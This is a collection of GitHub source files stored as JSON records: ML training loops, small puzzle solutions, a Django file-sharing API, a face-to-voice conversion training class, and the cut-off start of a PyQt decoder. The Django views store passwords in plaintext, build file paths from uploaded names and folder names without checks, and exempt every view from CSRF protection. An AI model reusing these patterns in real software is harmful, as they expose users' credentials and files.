spk_lens = envs._find_eos(captions)\n images = torch.from_numpy(images).cuda()\n captions = captions.cuda()\n spk_lens = torch.LongTensor(spk_lens).cuda()\n pred_out, logits = listener.predict(images, captions, spk_lens, output_logp=True)\n loss = F.cross_entropy(logits, torch.from_numpy(obs[\"goal\"]).cuda())\n accuracy = torch.mean((pred_out == torch.from_numpy(obs[\"goal\"]).cuda()).float())\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n if i % 1000 == 999:\n print(loss.item(), accuracy.item())\n with torch.no_grad():\n obs = dev_envs.reset()\n captions = dev_envs.game_file[\"captions\"][obs[\"images_ids\"][range(256), obs[\"goal\"]]]\n images = obs[\"images\"]\n spk_lens = dev_envs._find_eos(captions)\n images = torch.from_numpy(images).cuda()\n captions = captions.cuda()\n spk_lens = torch.LongTensor(spk_lens).cuda()\n pred_out, logits = listener.predict(images, captions, spk_lens, output_logp=True)\n loss = F.cross_entropy(logits, torch.from_numpy(obs[\"goal\"]).cuda())\n accuracy = torch.mean((pred_out == torch.from_numpy(obs[\"goal\"]).cuda()).float())\n print(loss.item(), accuracy.item())\n except KeyboardInterrupt:\n torch.save(listener.state_dict(), 
\"listener_200_hard_20.pt\")\n","repo_name":"neulab/ToM-Language-Acquisition","sub_path":"listener_pretraining.py","file_name":"listener_pretraining.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"32015666557","text":"#! /usr/bin/env python3\n\ndef count_increases():\n with open(\"day1/input.txt\") as depths:\n oldline = depths.readline()\n increases = 0\n for line in depths:\n if line <= oldline:\n continue\n else:\n increases += 1\n oldline = line\n return increases\n\ncount_increases()","repo_name":"Drtaylor1701/adventofcode","sub_path":"day1/depth_measurement.py","file_name":"depth_measurement.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14515382150","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n temp = x\n reverse = 0\n while x>0:\n last_digit = x%10\n reverse = reverse*10+last_digit\n x = x//10\n if temp == reverse:\n return True\n else:\n return False\n ","repo_name":"ishangogna/Leetcode","sub_path":"easy/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40926990951","text":"from django.http import HttpResponse, HttpResponseRedirect\nimport json\nimport django.contrib.auth as auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User as djUser\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import User, Folder, Data\nimport os\nimport socket\nimport zipfile\nimport datetime, time\nfrom yunpan.settings import DATA_FILE_PATH, TMP_FILE_PATH, HTTP_URL, PORT, DATA_FILE_URL, TMP_FILE_URL\n\n\n# Create your views here.\n\ndef quick_respone(ret = 200, dic = None):\n return HttpResponse(status=ret ,content=json.dumps(dic), content_type = 'application/json,charset=utf-8')\n\n\n@login_required()\n@csrf_exempt\ndef content(request):\n # 更新与获得用户信息\n\n user_name = request.user.username\n try:\n user = User.objects.get(user_name=user_name)\n except User.DoesNotExist:\n return quick_respone(404)\n\n if request.method == 'PUT':\n # 更新用户信息\n body_data = json.loads(request.body)\n user.user_name = body_data.get('user_name')\n user.real_name = body_data.get('real_name')\n user.student_id = body_data.get('student_id')\n user.gender = body_data.get('gender')\n user.user_class = body_data.get('class')\n user.phone = body_data.get('phone')\n user.mail = body_data.get('mail')\n user.save()\n return quick_respone()\n elif request.method == 'GET':\n # 返回用户信息\n ret_dict = dict()\n ret_dict['user_name'] = user.user_name\n ret_dict['real_name'] = user.real_name\n ret_dict['gender'] = user.gender\n ret_dict['student_id'] = user.student_id\n ret_dict['class'] = user.user_class\n ret_dict['mail'] = user.mail\n ret_dict['phone'] = user.phone\n return quick_respone(dic=ret_dict)\n return quick_respone(403)\n\n@csrf_exempt\ndef login(request):\n # 登录\n\n if request.method != 'POST':\n return quick_respone(403)\n\n if request.user.is_anonymous:\n body_data = json.loads(request.body)\n user_name = body_data.get('user_name')\n password = body_data.get('password')\n user = auth.authenticate(username = user_name, password = password)\n if not user:\n return quick_respone(ret = 401, dic={'message':'用户名或密码错误'})\n else:\n auth.login(request, user)\n return quick_respone()\n 
else:\n return quick_respone()\n\n\n@csrf_exempt\ndef register(request):\n # 注册\n \n if request.method != 'POST':\n return quick_respone(403)\n\n body_data = json.loads(request.body)\n user_name = body_data.get('user_name')\n real_name = body_data.get('real_name')\n student_id = body_data.get('student_id')\n password = body_data.get('password')\n\n if not user_name or not real_name or not student_id or not password:\n return quick_respone(ret = 403)\n\n try:\n user = User.objects.get(user_name=user_name)\n return quick_respone(ret=409, dic={'message': '用户名已存在'})\n except User.DoesNotExist:\n user = None\n\n try:\n user = User.objects.get(student_id=student_id)\n return quick_respone(ret=409, dic={'message': '学号已存在'})\n except User.DoesNotExist:\n user = None\n\n user = User()\n user.user_name= user_name\n user.password = password\n user.real_name = real_name\n user.student_id = student_id\n user.save()\n\n djUser.objects.create_user(username=user_name, password=password)\n\n return quick_respone()\n\n@csrf_exempt\n@login_required()\ndef folders(request):\n # 文件夹操作\n \n if request.method == 'GET':\n # 返回所有文件夹\n folders = Folder.objects.all()\n ret_list = []\n for folder in folders:\n item = dict()\n item['id'] = folder.id\n item['folder_name'] = folder.folder_name\n item['creator'] = folder.creator\n ret_list.append(item)\n return quick_respone(dic=ret_list)\n elif request.method == 'POST':\n # 创建一个文件夹\n body_data = json.loads(request.body)\n folder_name = body_data.get('folder_name')\n if not folder_name:\n return quick_respone(400)\n\n folder_path = os.path.join(DATA_FILE_PATH, folder_name)\n if os.path.exists(folder_path):\n return quick_respone(400)\n\n try:\n folder = Folder.objects.get(folder_name=folder_name)\n return quick_respone(409)\n except Folder.DoesNotExist:\n folder = None\n\n os.makedirs(folder_path)\n if not os.path.exists(folder_path):\n return quick_respone(400)\n\n user_name = request.user.username\n folder = Folder()\n folder.folder_name = folder_name\n folder.creator = user_name\n folder.save()\n\n return quick_respone()\n return quick_respone(403)\n\n@csrf_exempt\n@login_required()\ndef resources(request):\n # 资源操作\n \n if request.method == 'GET':\n user = request.GET.get('user', None)\n res_id = request.GET.get('res_id', None)\n if user:\n # 根据用户筛选资源\n ret_list = []\n if user == 'all':\n datas = Data.objects.filter(approved=True)\n else:\n datas = Data.objects.filter(uploader=user)\n for data in datas:\n item = dict()\n item['res_id'] = data.id\n item['res_name'] = data.res_name\n item['folder_name'] = data.folder_name\n item['uploader'] = data.uploader\n item['link'] = '%s:%s%s%s/%s' % (\n HTTP_URL, PORT, DATA_FILE_URL, data.folder_name, data.res_name)\n ret_list.append(item)\n return quick_respone(dic=ret_list)\n elif res_id:\n # 返回指定id的资源\n try:\n data = Data.objects.get(id = res_id)\n except Data.DoesNotExist:\n return quick_respone(404)\n item = dict()\n item['res_id'] = data.id\n item['res_name'] = data.res_name\n item['folder_name'] = data.folder_name\n item['uploader'] = data.uploader\n item['link'] = '%s:%s%s%s/%s' % (\n HTTP_URL, PORT, DATA_FILE_URL, data.folder_name, data.res_name)\n return quick_respone(dic=item)\n return quick_respone(403)\n\n elif request.method == 'POST':\n # 上传资源\n \n res_file = request.FILES.get('file', None)\n if not res_file:\n return quick_respone(403)\n\n file_name = res_file.name\n folder_id = request.POST.get('folder_id', None)\n if not folder_id:\n return quick_respone(403)\n\n try:\n folder = Folder.objects.get(id = 
folder_id)\n except Folder.DoesNotExist:\n return quick_respone(400)\n\n try:\n res = Data.objects.get(folder_name=folder.folder_name, res_name=file_name)\n return quick_respone(400)\n except Data.DoesNotExist:\n res = None\n\n file_path = os.path.join(DATA_FILE_PATH, folder.folder_name, file_name)\n if os.path.exists(file_path):\n return quick_respone(409)\n\n with open(os.path.join(DATA_FILE_PATH, folder.folder_name, file_name), 'wb') as f:\n for line in res_file.chunks() :\n f.write(line)\n res = Data()\n res.uploader = request.user.username\n res.folder_name = folder.folder_name\n res.res_name = file_name\n res.approved = False\n res.save()\n\n return quick_respone()\n return quick_respone(403)\n\n@csrf_exempt\n@login_required()\ndef logout(request):\n # 登出\n if request.method != 'POST':\n return quick_respone(403)\n\n auth.logout(request)\n return quick_respone()\n\n@csrf_exempt\n@login_required()\ndef folder(request):\n # 文件夹的详情\n if request.method != 'GET':\n return quick_respone(403)\n\n folder_id = request.GET.get('folder_id', None)\n if not folder_id:\n return quick_respone(403)\n\n try:\n folder = Folder.objects.get(id = folder_id)\n except Folder.DoesNotExist:\n return quick_respone(404)\n\n ret_dict = dict()\n ret_dict['folder_name'] = folder.folder_name\n ret_dict['creator'] = folder.creator\n ret_dict['resources'] = []\n datas = Data.objects.filter(folder_name=folder.folder_name)\n for data in datas:\n item = dict()\n item['res_id'] = data.id\n item['res_name'] = data.res_name\n item['folder_name'] = data.folder_name\n item['uploader'] = data.uploader\n item['link'] = '%s:%s%s%s/%s' % (\n HTTP_URL, PORT, DATA_FILE_URL, data.folder_name, data.res_name)\n ret_dict['resources'].append(item)\n return quick_respone(dic=ret_dict)\n\n@csrf_exempt\n@login_required()\ndef folder_download(request):\n # 文件夹打包下载\n if request.method != 'GET':\n return quick_respone(403)\n username = request.user.username\n\n folder_id = request.GET.get('folder_id', None)\n if not folder_id:\n return quick_respone(403)\n\n try:\n folder = Folder.objects.get(id = folder_id)\n except Folder.DoesNotExist:\n return quick_respone(404)\n\n time_str = datetime.datetime.now().strftime('%Y%m%d')\n zip_file_path = os.path.join(TMP_FILE_PATH, '%s_%s_%s.zip' % (time_str, username, folder.folder_name))\n folder_path = os.path.join(DATA_FILE_PATH, folder.folder_name)\n\n zipf = zipfile.ZipFile(zip_file_path, 'w')\n pre_len = len(os.path.dirname(folder_path))\n for parent, dirnames, filenames in os.walk(folder_path):\n for filename in filenames:\n pathfile = os.path.join(parent, filename)\n arcname = pathfile[pre_len:].strip(os.path.sep) # 相对路径\n zipf.write(pathfile, arcname)\n zipf.close()\n\n download_url = '%s:%s%s%s' % (\n HTTP_URL, PORT, TMP_FILE_URL, '%s_%s_%s.zip' % (time_str, username, folder.folder_name))\n\n return quick_respone(dic={'file':download_url})\n","repo_name":"NoManWorkingITPJMnage/yunpan_be","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10758294031","text":"class Solution:\r\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\r\n inserted = []\r\n while intervals:\r\n s,e = newInterval\r\n nS,nE = intervals[0]\r\n if e < nS:\r\n return inserted + [newInterval] + intervals\r\n elif nS <= s <= e <= nE:\r\n return inserted + intervals\r\n elif nE < s:\r\n inserted.append(intervals.pop(0))\r\n else :\r\n 
newInterval = [min(s,nS), max(e,nE)]\r\n intervals.pop(0)\r\n return inserted + [newInterval]\r\n \r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"abhinand5ai/Fluency","sub_path":"LC/monthly/2020/Sep/insertInterval.py","file_name":"insertInterval.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69807979465","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport os\nimport random\nfrom src.dataset import FaceSpeech_dataset\nfrom models.vqmivc_encoder import Encoder, CPCLoss_sameSeq, Encoder_lf0\nfrom models.vqmivc_decoder import Decoder_ac\nfrom models import FACE_ENCODER\nfrom models.vqmivc_mi_estimators import CLUBSample_group, CLUBSample_reshape\nfrom src.logger import Logger\nfrom torch.nn import DataParallel as DP\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict\nimport numpy as np\nfrom torch.autograd import grad\nimport copy\nfrom glob import glob\nfrom tqdm import tqdm\nimport soundfile as sf\nfrom itertools import chain\nfrom pathlib import Path\nfrom src.scheduler import WarmupScheduler\nimport kaldiio\nfrom Tools.preprocess.pwg_vqmivc_spectrogram import logmelspectrogram\nimport resampy\nimport pyworld as pw\nimport subprocess\nimport matplotlib.pyplot as plt\nfrom Experiment.experiment_tools import extract_logmel, seed_worker\n\n\nclass ExperimentBuilder(nn.Module):\n def __init__(self,config):\n super(ExperimentBuilder, self).__init__()\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n # torch.backends.cudnn.enabled = True\n seed = config.getint(\"hparams\",\"seed\")\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n random.seed(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n # os.environ['CUBLAS_WORKSPACE_CONFIG'] = ':4096:8'\n\n self.is_train = config.getboolean(\"input\", \"is_train\")\n self.if_provide_pseudo = config.getboolean(\"model\", \"if_provide_pseudo\")\n self.train_if_decvtor = False\n if self.is_train:\n os.environ['CUDA_VISIBLE_DEVICES'] = config.get(\"hparams\",\"gpu\")\n else:\n os.environ['CUDA_VISIBLE_DEVICES'] = config.get(\"hparams\",\"infer_gpu\")\n\n self.output_path=config.get(\"output\",\"output_dir\")\n if config.getboolean(\"input\",\"is_train\"):\n self.logger = Logger(os.path.join(self.output_path, 'log'))\n self.config = config\n\n if config.get(\"model\",\"encoder_lf0_type\") == \"no_emb\":\n self.dim_lf0 = 1\n else:\n self.dim_lf0 = 64\n\n\n self.encoder = Encoder(in_channels=config.getint(\"model\",\"encoder_in_channels\"), \n channels= config.getint(\"model\",\"encoder_channels\"), \n n_embeddings= config.getint(\"model\",\"encoder_n_embeddings\"), \n z_dim = config.getint(\"model\",\"encoder_z_dim\"), \n c_dim= config.getint(\"model\",\"encodr_c_dim\"))\n self.encoder_lf0 = Encoder_lf0(config.get(\"model\",\"encoder_lf0_type\"))\n self.cpc = CPCLoss_sameSeq(n_speakers_per_batch = config.getint(\"model\",\"n_speakers_per_batch\"),\n n_utterances_per_speaker = config.getint(\"model\",\"n_utterances_per_speaker\"),\n n_prediction_steps = config.getint(\"model\",\"n_prediction_steps\"),\n n_negatives = config.getint(\"model\",\"n_negatives\"),\n z_dim = config.getint(\"model\",\"encoder_z_dim\"), \n c_dim= config.getint(\"model\",\"encodr_c_dim\"))\n\n self.encoder_spk = FACE_ENCODER[config.get(\"model\",\"face_encoder\")](config.getint(\"model\", \"slot_size\"),config.getint(\"model\", 
\"slot_channel_size\"))\n\n self.decoder = Decoder_ac(dim_neck=config.getint(\"model\",\"encoder_z_dim\"), dim_lf0=self.dim_lf0, use_l1_loss=True)\n self.speech_decoder = copy.deepcopy(self.decoder)\n\n self.encoder.cuda()\n self.encoder_lf0.cuda()\n self.cpc.cuda()\n self.encoder_spk.cuda()\n self.decoder.cuda()\n self.speech_decoder.cuda()\n\n self.all_models = [self.encoder, self.encoder_lf0, \n self.cpc, self.encoder_spk, self.decoder, self.speech_decoder]\n\n self.optimizer = torch.optim.Adam(\n chain(self.encoder_spk.parameters(), self.decoder.parameters()),\n lr=config.getfloat(\"hparams\",\"scheduler_initial_lr\")) \n\n if config.getboolean(\"input\",\"is_train\"):\n root_path = Path(config.get(\"input\",\"data_path\"))\n self.train_data = FaceSpeech_dataset(\n root = root_path,\n n_sample_frames = config.getint(\"hparams\",\"sample_frames\"),\n mode='train' + '_' + config.get(\"input\",\"spk_num\"),\n face_type=config.get(\"model\", \"face_type\"),\n speech_type=config.get(\"model\", \"speech_type\"),\n if_provide_pseudo = self.if_provide_pseudo\n )\n\n self.valid_dataset = FaceSpeech_dataset(\n root = root_path,\n n_sample_frames = config.getint(\"hparams\",\"sample_frames\"),\n mode='valid' + '_' + config.get(\"input\",\"spk_num\"),\n face_type=config.get(\"model\",\"face_type\"),\n speech_type=config.get(\"model\", \"speech_type\"),\n if_provide_pseudo = self.if_provide_pseudo\n )\n\n self.dataloader = DataLoader(\n self.train_data,\n batch_size=config.getint(\"hparams\",\"batch_size\"), # 256\n shuffle=True,\n num_workers=config.getint(\"hparams\",\"n_works\"),\n pin_memory=True,\n worker_init_fn=seed_worker,\n drop_last=False)\n\n self.valid_dataloader = DataLoader(\n self.valid_dataset,\n batch_size=config.getint(\"hparams\",\"batch_size\"), # 256\n shuffle=False,\n num_workers=config.getint(\"hparams\",\"n_works\"),\n pin_memory=True,\n worker_init_fn=seed_worker,\n drop_last=False)\n\n warmup_epochs = 2000 // (len(self.train_data) // config.getint(\"hparams\",\"batch_size\"))\n print('warmup_epochs:', warmup_epochs)\n self.scheduler = WarmupScheduler(\n self.optimizer,\n warmup_epochs = warmup_epochs,\n initial_lr = config.getfloat(\"hparams\",\"scheduler_initial_lr\"),\n max_lr = config.getfloat(\"hparams\",\"scheduler_max_lr\"),\n milestones = [config.getint(\"hparams\",\"scheduler_milestones_0\"), \n config.getint(\"hparams\",\"scheduler_milestones_1\"),\n config.getint(\"hparams\",\"scheduler_milestones_2\"),],\n gamma = config.getfloat(\"hparams\",\"scheduler_gamma\")\n )\n\n\n self.iteration = 0\n \n try:\n self.checkpont = config.get(\"model\",\"checkpoint\")\n except:\n self.checkpont = None\n\n if self.checkpont is not None:\n self.load_ckpt(os.path.join(self.output_path,'models',self.checkpont))\n else:\n self.start_epoch = 1\n \n self.load_pretrain(config.get(\"model\", \"pretrain_model_path\"))\n \n self.kl_loss = nn.KLDivLoss(reduction=\"batchmean\", log_target=True)\n self.lambda_spk_emb_recall = self.config.getfloat(\"hparams\", \"lambda_spk_emb_recall\")\n self.lambda_address_recall = self.config.getfloat(\"hparams\", \"lambda_address_recall\")\n self.lambda_speech_rec = self.config.getfloat(\"hparams\", \"lambda_speech_rec\")\n self.lambda_diff_rec = self.config.getfloat(\"hparams\", \"lambda_diff_rec\")\n\n try:\n self.if_address_mse = self.config.getboolean(\"model\", \"if_address_mse\")\n except:\n self.if_address_mse = False\n \n try:\n self.if_decoder_no_grad = self.config.getboolean(\"model\", \"if_decoder_no_grad\")\n except:\n 
self.if_decoder_no_grad = False\n\n def to_eval(self):\n for m in self.all_models:\n m.eval()\n\n def to_train(self):\n for m in self.all_models:\n m.train()\n\n def load_ckpt(self, ckpt_path):\n pass\n\n\n def load_pretrain(self, ckpt_path):\n pretrain_checkpoint = torch.load(ckpt_path, map_location=lambda storage, loc: storage)\n if self.config.getboolean(\"model\", \"pretrain_encoder\"):\n self.encoder.load_state_dict(pretrain_checkpoint['encoder'])\n if self.config.getboolean(\"model\", \"pretrain_decoder\"):\n self.decoder.load_state_dict(pretrain_checkpoint['decoder'])\n self.speech_decoder.load_state_dict(pretrain_checkpoint['decoder'])\n if self.config.getboolean(\"model\", \"pretrain_cpc\"):\n self.cpc.load_state_dict(pretrain_checkpoint['cpc'])\n if self.config.getboolean(\"model\", \"pretrain_speech_spk_encoder\"):\n self.encoder_spk.speech_encoder.load_state_dict(pretrain_checkpoint['encoder_spk'])\n print(f'Load pretrain model from {ckpt_path}')\n\n\n def save_ckpt(self, epoch, ckpt_path=False):\n if not ckpt_path:\n # ckpt_path = os.path.join(self.output_root, self.output_path[2:], 'models', 'Best_model.rec_%.4f_ckpt-%04d.pt' % (val_mean[0], epoch))\n ckpt_path = os.path.join( self.output_path,'models','checkpoint', \"model.ckpt-{:0>4d}.pt\".format(epoch)) \n print(f\"Saving Facevc model and optimizer at epoch {epoch} iteration {self.iteration} to {ckpt_path}\")\n else:\n print(f\"Saving Current Best Facevc model and optimizer at epoch {epoch} iteration {self.iteration} to {ckpt_path}\")\n checkpoint_state = {\n \"encoder\": self.encoder.state_dict(),\n \"encoder_lf0\": self.encoder_lf0.state_dict(),\n \"cpc\": self.cpc.state_dict(),\n \"encoder_spk\": self.encoder_spk.state_dict(),\n \"decoder\": self.decoder.state_dict(),\n \"optimizer\": self.optimizer.state_dict(),\n \"scheduler\": self.scheduler.state_dict(),\n \"epoch\": epoch\n }\n torch.save(checkpoint_state, ckpt_path)\n \n def run_train_iter(self):\n raise NotImplementedError\n def run_valid_iter(self):\n raise NotImplementedError\n\n\n def run_valid(self):\n print('Please waiting! 
Valid')\n self.val_average_face_recon_loss = self.val_average_speech_recon_loss = self.val_average_speech_emb_recall_loss = self.val_average_address_recall_loss = 0\n self.to_eval()\n\n cur_epoch_metrics_val = []\n for self.val_idx, batch in enumerate(self.valid_dataloader, 1):\n metrics = self.run_valid_iter(batch)\n cur_epoch_metrics_val.append([v for k, v in metrics.items()])\n val_keys = [k for k in metrics.keys()]\n self.to_train()\n \n return cur_epoch_metrics_val, val_keys\n\n\n def run_experiment(self):\n best_score = 1000\n for epoch in range(self.start_epoch, self.config.getint(\"hparams\",\"n_epochs\")+1):\n self.average_face_recon_loss = self.average_speech_recon_loss = self.average_speech_emb_recall_loss = self.average_address_recall_loss = 0\n\n epoch_start_time = time.time()\n cur_epoch_metrics = []\n cur_epoch_metrics_val = []\n for self.idx, batch in enumerate(self.dataloader ,1):\n metrics = self.run_train_iter(batch)\n # self.logger.log_training(metrics, self.iteration)\n cur_epoch_metrics.append([v for k, v in metrics.items()])\n self.iteration = self.iteration + 1\n\n train_keys = [k for k in metrics.keys()]\n epoch_train_time = time.time() - epoch_start_time\n train_mean = np.mean(cur_epoch_metrics, axis=0)\n\n description = (', ').join(['{}: {:.4f}'.format(k, v) for k, v in zip(train_keys, train_mean)])\n Train_num = 'Epoch {:3d} Inter {:4d} '.format(epoch,self.iteration)\n description = Train_num + description\n print(description)\n\n if epoch == 1:\n cur_epoch_metrics_val, val_keys = self.run_valid()\n epoch_total_time = time.time() - epoch_start_time\n val_mean = np.mean(cur_epoch_metrics_val, axis=0)\n\n elif self.config.get(\"input\",\"dataset\") == 'lrs3' and epoch%5==0:\n # One epoch metrics\n cur_epoch_metrics_val, val_keys = self.run_valid()\n epoch_total_time = time.time() - epoch_start_time\n val_mean = np.mean(cur_epoch_metrics_val, axis=0)\n bests = glob(os.path.join( self.output_path, 'models', 'Best_*.pt'))\n bests.sort()\n if len(bests) > 3:\n for prev in bests[3:]:\n os.remove(prev)\n\n if val_mean[0] < best_score and epoch > 0.3 * (self.config.getint(\"hparams\",\"n_epochs\")+1):\n ckpt_path = os.path.join( self.output_path, 'models', 'Best_model.rec_%.4f_ckpt-%04d.pt' % (val_mean[0], epoch))\n best_score = val_mean[0]\n self.save_ckpt(epoch, ckpt_path)\n\n elif self.config.get(\"input\", \"dataset\") == 'vgg':\n cur_epoch_metrics_val, val_keys = self.run_valid()\n epoch_total_time = time.time() - epoch_start_time\n val_mean = np.mean(cur_epoch_metrics_val, axis=0)\n\n\n self.logger.log_epoch(train_mean, val_mean, train_keys,val_keys,\n epoch_train_time, epoch_total_time, epoch)\n self.scheduler.step()\n\n if not os.path.exists(os.path.join( self.output_path,'models','checkpoint')):\n os.makedirs(os.path.join( self.output_path,'models','checkpoint'))\n\n if (epoch % 50==0 ):\n self.save_ckpt(epoch)\n save_model_paths = glob(os.path.join( self.output_path, 'models', 'checkpoint','*.pt'))\n save_model_paths.sort()\n if len(save_model_paths) > 3:\n for prev in save_model_paths[:3]:\n os.remove(prev)\n \n\n\nclass Facevoice_memory_vqmivc_pretrain_pseudo(ExperimentBuilder):\n def __init__(self,config):\n super(Facevoice_memory_vqmivc_pretrain_pseudo,self).__init__(config)\n\n\n def mi_second_forward(self, mels, lf0, input_face, input_speech, speech_rec=False):\n self.optimizer.zero_grad()\n\n face, diff_face = input_face\n speech, diff_speech = input_speech \n z, c, _, vq_loss, perplexity = self.encoder(mels)\n # print(mels[5,:])\n cpc_loss, accuracy = 
self.cpc(z, c)\n speech_emb, speech_emb_recall, face_emb, face_emb_recall, speech_address, face_address = self.encoder_spk(face, speech)\n diff_face_emb_recall= self.encoder_spk.forward_face(diff_face)\n diff_speech_emb = self.encoder_spk.forward_speech(diff_speech)\n # diff_face_emb_recall_1 = diff_face_emb_recall_1.detach()\n # diff_speech_emb_1 = diff_speech_emb_1.detach() \n\n speech_emb_recall_loss = F.mse_loss(speech_emb, speech_emb_recall)\n address_recall_loss = self.kl_loss(face_address, speech_address)\n\n lf0_embs = self.encoder_lf0(lf0)\n face_recon_loss, pred_mels = self.decoder(z, lf0_embs, face_emb_recall, mels.transpose(1,2))\n face_pred_mels, face_pred_mels_postnet = self.decoder.forward_pseudo(z, lf0_embs, diff_face_emb_recall, mels.transpose(1,2), if_no_grad=self.if_decoder_no_grad)\n speech_pred_mels, speech_pred_mels_postnet = self.speech_decoder.forward_pseudo(z, lf0_embs, diff_speech_emb, mels.transpose(1,2), if_no_grad=self.if_decoder_no_grad)\n speech_recon_loss = torch.tensor(0.)\n\n diff_pred_recon_loss = torch.tensor(0.).cuda()\n\n\n diff_pred_recon_loss = F.mse_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels_postnet, speech_pred_mels_postnet) + \\\n F.mse_loss(face_pred_mels_postnet, speech_pred_mels_postnet)\n\n loss = face_recon_loss + self.lambda_spk_emb_recall * speech_emb_recall_loss + \\\n self.lambda_address_recall * address_recall_loss + self.lambda_diff_rec * diff_pred_recon_loss\n \n loss.backward()\n\n if self.config.getboolean(\"model\",\"train_if_clip\"):\n torch.nn.utils.clip_grad_norm_(chain(self.encoder_spk.parameters(), self.decoder.parameters()), self.config.getfloat(\"hparams\",\"clip_value\"))\n\n self.optimizer.step()\n return face_recon_loss, speech_recon_loss, speech_emb_recall_loss, address_recall_loss, diff_pred_recon_loss\n\n\n def run_train_iter(self,batch):\n step_start_time = time.time()\n mels, lf0, speakers, face, speech, diff_face, diff_speech,= batch\n\n mels = mels.cuda() \n lf0 = lf0.cuda()\n # print(speakers)\n face = face.cuda().squeeze(1) # (256, 1, 512)\n diff_face= diff_face.cuda().squeeze(1)\n input_face = [face, diff_face]\n\n speech = speech.cuda().squeeze(1)\n diff_speech= diff_speech.cuda().squeeze(1)\n input_speech = [speech, diff_speech]\n\n face_recon_loss, speech_recon_loss, speech_emb_recall_loss, address_recall_loss, diff_pred_recon_loss = self.mi_second_forward(mels, lf0, input_face, input_speech)\n \n metrics = OrderedDict()\n metrics['face_recon_loss'] = face_recon_loss\n metrics['speech_recon_loss'] = speech_recon_loss\n metrics['diff_pred_recon_loss'] = diff_pred_recon_loss\n metrics['speech_emb_recall_loss'] = speech_emb_recall_loss\n metrics['address_recall_loss'] = address_recall_loss\n metrics['Steptime'] = time.time()-step_start_time\n metrics['lr'] = self.optimizer.param_groups[0]['lr']\n return metrics\n\n\n def run_valid_iter(self,batch):\n\n mels, lf0, speakers, face, speech, diff_face, diff_speech= batch\n mels = mels.cuda() \n lf0 = lf0.cuda()\n\n face = face.cuda().squeeze(1) # (256, 1, 512)\n diff_face= diff_face.cuda().squeeze(1)\n input_face = [face, diff_face]\n\n speech = speech.cuda().squeeze(1)\n diff_speech= diff_speech.cuda().squeeze(1)\n input_speech = [speech, diff_speech]\n\n with torch.no_grad():\n z, c, z_beforeVQ, vq_loss, perplexity = self.encoder(mels)\n speech_emb, speech_emb_recall, face_emb, face_emb_recall, speech_address_log, face_address_log = self.encoder_spk(face, speech)\n 
diff_face_emb_recall = self.encoder_spk.forward_face(diff_face)\n diff_speech_emb = self.encoder_spk.forward_speech(diff_speech)\n \n speech_emb_recall_loss = F.mse_loss(speech_emb, speech_emb_recall)\n address_recall_loss = self.kl_loss(face_address_log, speech_address_log)\n\n lf0_embs = self.encoder_lf0(lf0)\n face_recon_loss, pred_mels = self.decoder(z, lf0_embs, face_emb_recall, mels.transpose(1,2))\n face_pred_mels, face_pred_mels_postnet = self.decoder.forward_pseudo(z, lf0_embs, diff_face_emb_recall, mels.transpose(1,2))\n speech_pred_mels, speech_pred_mels_postnet = self.speech_decoder.forward_pseudo(z, lf0_embs, diff_speech_emb, mels.transpose(1,2))\n diff_pred_recon_loss = torch.tensor(0.).cuda()\n\n diff_pred_recon_loss = F.mse_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels_postnet, speech_pred_mels_postnet) + \\\n F.mse_loss(face_pred_mels_postnet, speech_pred_mels_postnet)\n\n\n metrics = OrderedDict()\n metrics['val_face_recon_loss'] = face_recon_loss\n metrics['val_speech_emb_recall_loss'] = speech_emb_recall_loss\n metrics['val_address_recall_loss'] = address_recall_loss\n metrics['val_diff_pred_recon_loss'] = diff_pred_recon_loss\n return metrics\n\n\n\n \n\n\n \n\n\n\n \n\n\n \n\n \n\n\n","repo_name":"Levent9/Zero-shot-FaceVC","sub_path":"Experiment/experiment_memory_vqmivc_pretrain_pseudo.py","file_name":"experiment_memory_vqmivc_pretrain_pseudo.py","file_ext":"py","file_size_in_byte":20082,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"42025465904","text":"import os\nimport traceback\n\nimport loguru\nimport matplotlib\nimport numpy as np\nimport requests\n\nfrom app.ui.bad_channel_ui import ChannelWidget\nfrom app.utils.sys_tools import bind_cpu\n\nmatplotlib.use(\"Qt5Agg\") # 声明使用pyqt5\nimport pyqtgraph as pg\n\nfrom app.services.dog_walk_decoder_service import DogWalkDecoderService\nfrom app.utils.asyncqt5 import async_qt\nfrom ui.eeg_decoder import Ui_MainWindow\nfrom app.config.decoder_setting import DecoderSetting, NeuroSetting, BehaviorSetting, MotionInputTypeEnum, \\\n TargetTypeEnum, DogWalkDecodeSetting\n\n\nclass DecoderService:\n colors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'w']\n\n def __init__(self):\n self.win: Ui_MainWindow = None\n self._engry_data = []\n self._decode = None\n self._decoding = False\n self.log_level = 1\n self._plots = [ \"速度\", \"位置\"]\n # self._filter_channel_widget = 